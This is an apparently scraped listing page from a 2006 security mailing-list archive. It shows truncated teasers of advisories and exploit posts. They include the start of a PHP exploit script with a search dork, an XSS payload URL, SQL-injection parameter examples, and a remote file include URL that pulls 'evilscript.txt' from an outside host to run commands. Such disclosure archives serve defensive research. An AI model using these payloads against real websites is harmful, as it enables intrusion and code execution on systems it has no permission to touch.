|
|
Colapse all |
Post message
[SECURITY] [DSA 1083-1] New motor packages fix arbitrary code execution 2006-05-31 joey infodrom org (Martin Schulze) pppBlog <= 0.3.8 administrative credentials/system disclosure 2006-05-30 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "pppBlog <= 0.3.8 system disclosure exploit\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: intext:\"Powered by pppblog\"\r\n\r\n"; /* works with: register_globals=On */ if ($argc [ more ] [ reply ] Re: [Info Disclosure] Diesel PHP Job Site Latest Version 2006-05-30 support dieselscripts com (1 replies) Hello, To explain this to all visitors, the information is used to prevent any unauthorized copies from running on the web. All of the php developers that sell products online use this method or even more methods. Please stop making such a big deal out of this because it's our way of protec [ more ] [ reply ] Re: [Info Disclosure] Diesel PHP Job Site Latest Version 2006-05-31 GulfTech Security Research (security gulftech org) Xss exploit in Chipmunk directory 2006-05-28 black code (black-cod3 hotmail com) Xss exploit in Chipmunk directory forum type : Chipmunk directory bug found by : black-code team : site-down type : Xss black-code: codes : http://www.example.com/directory/index.php?catid=catid&start='><script>a lert(10)</script> path to admin login: http://www.xxx.com/path/admin All my resp [ more ] [ reply ] Open Searchable Image Catalogue: XSS and SQL Injection Vulnerabilities 2006-05-30 enji seclab tuwien ac at =========================================================== Open Searchable Image Catalogue: XSS and SQL Injection Vulnerabilities =========================================================== Technical University of Vienna Security Advisory TUVSA-0605-001, May 30, 2006 ========================== [ more ] [ reply ] [ GLSA 200605-17 ] libTIFF: Multiple vulnerabilities 2006-05-30 Stefan Cornelius (dercorny gentoo org) [ MDKSA-2006:093 ] - Updated dia packages fix string format vulnerabilities. 2006-05-30 security mandriva com [ GLSA 200605-16 ] CherryPy: Directory traversal vulnerability 2006-05-30 Stefan Cornelius (dercorny gentoo org) Fire fox dos exploit 2006-05-30 co296 aol com (1 replies) Backdoor in RelevantKnowledge adware (What are we fighting for?) 2006-05-30 3APA3A (3APA3A SECURITY NNOV RU) Authors: YAG KOHHA (skyhole (at) gmail (dot) com [email concealed]), Lame Title: Backdoor in RelevantKnowledge adware (What are we fighting for?) Vendor: TMRG, Inc. Description: RelevantKnowledge is an adware distributed with different shareware projects, e.g. Artisian Burner. RelevantKnowle [ more ] [ reply ] WBB<--v2.3.4"misc.php" SQL injection Vulnerability 2006-05-29 CrAzY CrAcKeR hotmail com =================================== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-LiNuX_rOOt-BoNy_m-rootshill =================================== Example:- /misc.php?action=faq?sid=[SQL injection] ================ [ more ] [ reply ] Bratpack Cross Site Scripting Vulnerability 2006-05-29 CrAzY CrAcKeR hotmail com =================================== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-LiNuX_rOOt-BoNy_m-rootshill =================================== Example:- /projects.php?TaalId=[XSS] ============================== [ more ] [ reply ] NorthStudio Cross Site Scripting Vulnerability 2006-05-29 CrAzY CrAcKeR hotmail com =================================== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-LiNuX_rOOt-BoNy_m-rootshill =================================== Example:- /rpt_menu.php?mnuId=[XSS] Search:- Powered by northStudio [ more ] [ reply ] phpMyDesktop|arcade 1.0 FINAL Code Execution 2006-05-29 darkgod xsf gmail com phpMyDesktop|arcade 1.0 FINAL Code Execution Exploit found-by: darkgod (darkgod.xsf (at) gmail (dot) com [email concealed]) links: criticalsecurity.NET, hackthissite.org, hacbloc.org video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar phpMyDesktop|arcade is a php-based 'bridge' between a game and message b [ more ] [ reply ] Re: On the Recent PGP and Truecrypt Posting 2006-05-29 Jon Callas (jon pgp com) > From what I understand about this issue. It seems the issue is > that users are not understanding how the system works. This would > then be a usability issue where the user's idea of how the system > works and the actual way in which it works is very different. PGP > has had issues wit [ more ] [ reply ] 4nNukeWare<--V 0.91 SQL Injection exploits 2006-05-29 CrAzY CrAcKeR hotmail com =================================== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker Breeeeh-Rootshil-LiNuX_rOOt-BoNy_m =================================== Example:- modules.php?name=4nForum&file=viewthread&tid=[SQL] ======= [ more ] [ reply ] Jiwa Financials - Reporting allows execution of arbitrary reports as SQL user with full permissions. 2006-05-30 Robert misait com |
|
Privacy Statement |
forum type : Support cards v1
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploit :
http://www.example.com/support/include/open_form.php?include_dir=http://
ursite/evilscript.txt?cmd=
[ more ] [ reply ]